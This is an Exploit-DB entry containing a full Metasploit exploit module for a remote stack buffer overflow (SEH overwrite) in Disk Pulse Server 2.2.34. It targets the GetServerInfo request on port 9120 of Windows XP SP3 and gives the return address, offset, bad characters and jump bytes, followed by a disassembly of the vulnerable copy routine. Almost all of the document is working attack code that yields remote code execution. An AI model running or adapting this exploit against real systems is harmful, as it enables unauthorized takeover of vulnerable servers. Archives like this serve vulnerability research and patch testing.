Disk Pulse Server 2.2.34 - 'GetServerInfo' Remote Buffer Overflow (Metasploit)

EDB-ID:

42722

CVE:

N/A




Platform:

Windows

Date:

2010-10-19


require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability found
					in libpal.dll of Disk Pulse Server v2.2.34. The overflow
					is triggered when sending an overly long 'GetServerInfo'
					request to the service listening on port 9120.
			},
			'Author'         => [ 'James Fitts' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'BID', '43919' ],
					[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ],
					[ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ]
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space' => 300,
					'BadChars' => "\x00\x0a\x0d\x20",
					'DisableNops' => 'True',
					'StackAdjustment' => -3500,
					'Compat'	=>
						{
							'SymbolLookup' => 'ws2ord',
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 
						'Windows XP SP3 EN', 
							{ 
								# p/p/r 
								# libspp.dll
								'Ret' => 0x1006f71f,
								'Offset' => 303
							} 
					],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Oct 19 2010'))

		register_options([Opt::RPORT(9120)], self.class)
	end

	def exploit
		connect

		sploit =  "GetServerInfo"
		sploit << "\x41" * 8
		sploit << payload.encoded
		sploit << "\x42" * (303 - (8 + payload.encoded.length))
		sploit << generate_seh_record(target.ret)
		sploit << make_nops(4)
		sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311
		sploit << rand_text_alpha_upper(200)

		print_status("Trying target #{target.name}...")

		sock.put(sploit)

		handler
		disconnect
	end

end
__END__
0033C05C   55               PUSH EBP
0033C05D   8B6C24 1C        MOV EBP,DWORD PTR SS:[ESP+1C]
0033C061   3AC2             CMP AL,DL
0033C063   74 14            JE SHORT libpal.0033C079
0033C065   3C 0D            CMP AL,0D
0033C067   74 10            JE SHORT libpal.0033C079
0033C069   3C 0A            CMP AL,0A
0033C06B   74 0C            JE SHORT libpal.0033C079
0033C06D   41               INC ECX
0033C06E   88042F           MOV BYTE PTR DS:[EDI+EBP],AL
0033C071   47               INC EDI
0033C072   8A0431           MOV AL,BYTE PTR DS:[ECX+ESI]
0033C075   84C0             TEST AL,AL
0033C077  ^75 E8            JNZ SHORT libpal.0033C061
0033C079   C6042F 00        MOV BYTE PTR DS:[EDI+EBP],0
0033C07D   5D               POP EBP
0033C07E   5F               POP EDI
0033C07F   890B             MOV DWORD PTR DS:[EBX],ECX
0033C081   5E               POP ESI
0033C082   B8 01000000      MOV EAX,1
0033C087   5B               POP EBX
0033C088   C3               RETN